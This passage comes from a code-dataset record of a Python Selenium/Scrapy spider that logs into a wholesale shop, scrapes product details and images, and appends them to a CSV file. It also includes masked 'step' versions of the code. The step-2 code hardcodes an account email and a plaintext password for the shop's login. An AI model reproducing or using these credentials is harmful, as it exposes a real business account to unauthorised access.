file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + csv_image_url[17] + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
# article_number_list.append(csv_article_number)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error3')
# for m in range(0, 20): IF YOU WANT TO DOWNLOAD CERTAIN PRODUCTS, YOU CAN WRITE LIKE THIS.
# for m in range(0, len(list4)): IF YOU WANT TO DOWNLOAD ALL PRODUCTS, YOU CAN WRITE LIKE THIS.
for m in range(0, len(list4)):
try:
if list4[m] not in old_product_url:
self.loggger.info('********************** ' + str(k) + ' ******************************')
self.driver.get(list4[m])
WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))
# breadcrumbs = self.driver.find_element_by_id('breadcrumbs')
# categories = breadcrumbs.find_elements_by_xpath('.//a')
# for category in categories:
# csv_categories.append(category.text)
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading4 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock4 non-exist')
try:
price_new = offer.find_element_by_class_name('priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name('priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name('priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price4 non-exist')
csv_price_new = ''
csv_price_old = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\n', ' ').replace('\r', '').rstrip().lstrip()
except:
self.loggger.info('description4 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id('pManufacturer')
csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')
except:
self.loggger.info('article number4 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image4 non-exist')
######################################### CSV File Writing #########################################
# if csv_article_number not in article_number_list:
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' + list4_categories[m].split('/')[1] + ',' + list4_categories[m].split('/')[2] + ',' + list4_categories[m].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + csv_image_url[13] + ',' + csv_image_url[14] + ',' + csv_image_url[15] + ',' + csv_image_url[16] + ',' + csv_image_url[17] + ',' + ' ' + ',' + csv_stock + ',' + list4[m] + '\n')
# article_number_list.append(csv_article_number)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
|
flexible
|
{
"blob_id": "237a93ff73cb98fd9d4006f14d3cadbdc09259a4",
"index": 9885,
"step-1": "<mask token>\n\n\nclass ProductSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ProductSpider(scrapy.Spider):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n options = webdriver.ChromeOptions()\n options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def parse(self, response):\n fh = logging.FileHandler(log_output_file)\n fh.setLevel(logging.INFO)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).setLevel(logging.WARNING)\n logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)\n logging.getLogger('selenium.webdriver.remote.remote_connection'\n ).addHandler(fh)\n logging.getLogger('urllib3.connectionpool').addHandler(fh)\n logging.getLogger().addHandler(fh)\n self.loggger = logging.getLogger()\n self.driver.get(response.url)\n list1 = []\n list2 = []\n list3 = []\n list4 = []\n list5 = []\n list3_categories = []\n list4_categories = []\n csv_categories1 = ''\n csv_heading = ''\n csv_stock = ''\n csv_price_new = ''\n csv_price_old = ''\n csv_desc = ''\n csv_article_number = ''\n csv_image_url = []\n old_product_url = []\n WebDriverWait(self.driver, 20).until(EC.presence_of_element_located\n ((By.ID, 'email')))\n username = self.driver.find_element_by_id('email')\n username.send_keys('info@themobilestore.se')\n username = self.driver.find_element_by_id('password')\n username.send_keys('order88')\n login = self.driver.find_element_by_class_name('button-confirm')\n login.click()\n time.sleep(5)\n fh, abs_path = mkstemp()\n with fdopen(fh, 'w') as new_file:\n with open('tekniknet.csv') as old_file:\n for line in old_file:\n new_file.write(line.replace('NEW', 'old'))\n remove('tekniknet.csv')\n move(abs_path, 'tekniknet.csv')\n with open('tekniknet.csv', 'r') as ins:\n for line in ins:\n old_product_url.append(line.split(',')[-1])\n file = open('tekniknet.csv', 'a', errors='replace')\n for wrapper1 in self.driver.find_elements_by_class_name('level-0'):\n child_wrapper1 = wrapper1.find_element_by_xpath('./a')\n link1 = child_wrapper1.get_attribute('href')\n list1.append(link1)\n self.loggger.info(\n '*************************************************')\n self.loggger.info(link1)\n for i in range(0, len(list1) - 4):\n self.driver.get(list1[i])\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'inner')))\n for wrapper2 in self.driver.find_elements_by_class_name('inner'\n ):\n try:\n sub2 = wrapper2.find_element_by_class_name('subLinks')\n child_wrapper2 = sub2.find_elements_by_xpath('.//a')\n for child2 in child_wrapper2:\n link2 = child2.get_attribute('href')\n list2.append(link2)\n self.loggger.info(\n '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^'\n )\n self.loggger.info(link2)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n except:\n try:\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1 = subcategory.find_elements_by_xpath('.//a')\n for child3 in wrapper2_1:\n link2_1 = child3.get_attribute('href')\n list5.append(link2_1)\n for n in range(0, len(list5)):\n self.driver.get(list5[n])\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.ID,\n 'categorySubCategories')))\n subcategory = self.driver.find_element_by_id(\n 'categorySubCategories')\n wrapper2_1_1 = subcategory.find_elements_by_xpath(\n './/a')\n for child3_1 in wrapper2_1_1:\n if child3_1.text != 'Visa alla':\n link2_1_1 = child3_1.get_attribute('href')\n list2.append(link2_1_1)\n except:\n try:\n breadcrumbs2 = self.driver.find_element_by_id(\n 'breadcrumbs')\n categories2 = breadcrumbs2.find_elements_by_xpath(\n './/li')\n csv_categories2 = ''\n for category2 in categories2:\n csv_categories2 = (csv_categories2 + category2.\n text + '/')\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME,\n 'listProduct')))\n for wrapper2_2 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n wrapper2_3 = wrapper2_2.find_element_by_xpath(\n './/a')\n link2_2 = wrapper2_3.get_attribute('href')\n list4.append(link2_2)\n list4_categories.append(csv_categories2)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link2_2)\n self.loggger.info('error')\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for j in range(0, len(list2)):\n try:\n self.loggger.info('**********-------------- ' + str(j) +\n ' ******************************')\n self.driver.get(list2[j])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')\n categories1 = breadcrumbs1.find_elements_by_xpath('.//li')\n csv_categories1 = ''\n for category1 in categories1:\n csv_categories1 = csv_categories1 + category1.text + '/'\n WebDriverWait(self.driver, 20).until(EC.\n presence_of_element_located((By.CLASS_NAME, 'listProduct'))\n )\n for wrapper3 in self.driver.find_elements_by_class_name(\n 'listProduct'):\n child_wrapper3 = wrapper3.find_element_by_xpath('.//a')\n link3 = child_wrapper3.get_attribute('href')\n list3.append(link3)\n list3_categories.append(csv_categories1)\n self.loggger.info(\n '&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'\n )\n self.loggger.info(link3)\n except Exception as e:\n self.loggger.info(e)\n self.loggger.info('error')\n for k in range(0, len(list3)):\n try:\n if list3[k] not in old_product_url:\n self.loggger.info('----------------------- ' + str\n (k) + ' ******************************')\n self.driver.get(list3[k])\n WebDriverWait(self.driver, 30).until(EC.\n presence_of_element_located((By.ID, 'breadcrumbs')))\n offer = self.driver.find_element_by_id('productPageUpper')\n try:\n heading = offer.find_element_by_class_name('pHeader')\n csv_heading = heading.text.replace(',', '.')\n except:\n self.loggger.info('heading3 non-exist')\n csv_heading = ''\n try:\n stock = offer.find_element_by_class_name('instock')\n csv_stock = stock.text\n except:\n csv_stock = 'Out of stock'\n self.loggger.info('stock3 non-exist')\n csv_stock = ''\n try:\n price_new = offer.find_element_by_class_name(\n 'priceRegular')\n csv_price_new = price_new.text.split(' ')[0]\n except:\n try:\n price_new = offer.find_element_by_class_name(\n 'priceNew')\n csv_price_new = price_new.text.split(' ')[0]\n price_old = offer.find_element_by_class_name(\n 'priceOld')\n csv_price_old = price_old.text.split(' ')[0]\n except:\n self.loggger.info('price3 non-exist')\n csv_price_old = ''\n csv_price_new = ''\n try:\n desc = offer.find_element_by_id('pDesc')\n csv_desc = desc.get_attribute('innerHTML').replace(',',\n '-').replace('\\n', ' ').replace('\\r', '').rstrip(\n ).lstrip()\n except:\n self.loggger.info('description3 non-exist')\n csv_desc = ''\n try:\n article_number = offer.find_element_by_id(\n 'pManufacturer')\n csv_article_number = article_number.text.split(' ')[-1\n ].replace(',', '.')\n except:\n self.loggger.info('article number3 non-exist')\n csv_article_number = ''\n try:\n pimages = offer.find_elements_by_xpath('.//img')\n csv_image_url = []\n for pimage in pimages:\n image_url = pimage.get_attribute('src')\n if image_url not in csv_image_url:\n csv_image_url.append(image_url)\n except:\n self.loggger.info('image3 non-exist')\n if len(csv_image_url) == 1:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 2:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + csv_stock + ',' + list3[k] + '\\n')\n elif len(csv_image_url) == 3:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n list3_categories[k].split('/')[3] + ',' +\n csv_heading + ',' + csv_desc + ',' +\n csv_price_new + ',' + csv_price_old + ',' +\n csv_image_url[0] + ',' + csv_image_url[1] + ',' +\n csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +\n ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3\n [k] + '\\n')\n elif len(csv_image_url) == 4:\n file.write('NEW' + ',' + csv_article_number + ',' +\n list3_categories[k].split('/')[1] + ',' +\n list3_categories[k].split('/')[2] + ',' +\n 